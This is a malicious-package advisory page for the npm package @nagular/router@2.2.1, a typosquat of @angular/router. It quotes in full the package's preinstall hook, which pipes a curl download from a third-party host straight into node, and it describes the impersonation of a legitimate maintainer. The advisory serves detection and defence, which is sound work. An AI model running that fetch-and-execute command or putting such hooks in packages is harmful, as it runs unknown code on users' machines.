Logo
npm

@nagular/router@2.2.1

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC

Malicious

OSV ID

MAL-2026-17500

Ecosystem

npm

Summary

package.json declares a preinstall lifecycle hook that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an opaque JavaScript payload from an unrelated third-party repository (gitflic.ru/hellscripter/install-scripts) proxied via web.archive.org and piping it directly into node at npm install time. The fetched bytes are not pinned by hash or version, the host is unrelated to the declared repository (pillarjs/router) or publisher domain (somethingdoug.com), and execution happens automatically with full user privileges on every install. Package metadata further impersonates the maintainer of the legitimate pillarjs/router package (author: Douglas Christopher Wilson) and uses the scope @nagular/router, a name likely to be confused with @angular/router, consistent with a typosquat lure designed to trick installers into running the preinstall dropper.

Source: amazon-inspector (5db05365620b3f716b28b41577e593bc35a6699aee20090951158c206c2585ca)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.